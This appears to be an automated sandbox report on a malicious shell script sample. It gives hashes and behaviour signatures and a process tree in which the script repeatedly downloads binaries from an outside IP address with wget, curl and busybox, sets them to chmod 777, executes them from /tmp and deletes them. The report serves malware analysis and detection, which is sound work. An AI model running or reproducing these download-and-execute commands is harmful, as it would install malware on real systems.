Analysis
-
max time kernel
40s -
max time network
42s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:35
Static task
static1
Behavioral task
behavioral1
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
-
Size
10KB
-
MD5
3a1ff8e10160c3ffbe68101993bf1067
-
SHA1
cbe663779e29b21349683a8c313cd1cb1c5eecaf
-
SHA256
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63
-
SHA512
8513787e954b7a1209578497e6d91f13f54b1ab38ef937cb0f6d6cfd320fc1c4c4a7a8a4890ee1a8ad873d62e91cb2e5e82fa1f3673c62e6bb23d94110307586
-
SSDEEP
192:v7mG3aGTwUII9c4gCONyqRGZy5947TfmG3aGL4II9c845947T/CONyqy:vS4gCONyqRGZy5947Te45947T/CONyqy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 806 chmod 842 chmod 862 chmod 877 chmod 798 chmod 830 chmod 895 chmod 915 chmod 824 chmod 848 chmod 681 chmod 812 chmod 889 chmod 901 chmod 750 chmod 773 chmod 854 chmod 921 chmod 927 chmod 711 chmod 731 chmod 818 chmod 883 chmod 908 chmod 689 chmod 790 chmod 836 chmod 871 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 682 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 691 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 712 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 732 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 751 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 775 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 791 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 799 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 807 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 813 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 819 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 825 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 831 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 837 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 843 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 849 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 855 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 863 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 872 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 878 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 884 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 890 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 896 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 902 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 909 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 916 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 922 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 928 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 791 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 817 busybox 819 phFMgsQArmVdg945D14ipduIUYswPNrcK1 820 rm 860 curl 886 wget 777 wget 782 curl 887 curl 888 busybox 863 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 864 rm 890 phFMgsQArmVdg945D14ipduIUYswPNrcK1 857 wget 861 busybox 891 rm 786 busybox 793 rm 815 wget 816 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl
Processes
-
/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:651
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:679
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:682
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:683
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:684
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:686
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:692
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:706
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:712
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:726
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:748
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:769
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:786
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:791
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:797
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:805
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:811
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:817
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:819
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:823
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:829
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:835
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:841
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:847
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:853
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:857
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:862
-
-
